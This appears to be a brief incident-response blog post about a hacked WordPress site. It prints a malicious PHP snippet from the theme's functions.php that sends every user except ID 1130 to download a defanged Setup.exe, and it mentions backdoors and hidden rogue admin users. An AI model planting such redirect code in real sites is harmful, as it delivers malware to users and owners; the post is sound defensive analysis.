Recently our incident response analyst Harshad Mane worked on a site that redirected users to a third-party malicious site whenever they logged into the WordPress admin interface.
We found the culprit in the functions.php file of the active theme.
if ( get_current_user_id() != '1130') {
header("Location: hxxps://photoscape[.]ch/Setup.exe");
}
This code checks the Id of the current WordPress user and redirects them (if their Id is not 1130) to download a malicious Setup.exe file.
The functions.php file wasn’t the only infected file. We also removed many backdoors and a script that hid rogue admin users in the User’s list in the WordPress dashboard.
This campaign was active about a year ago. Since then the domain name has expired and the site owners spotted and deleted the rogue admin user with Id 1130. However, the annoying redirect persisted and even caused blacklisting of the site by some antiviruses, so the site owners requested us to clean their site.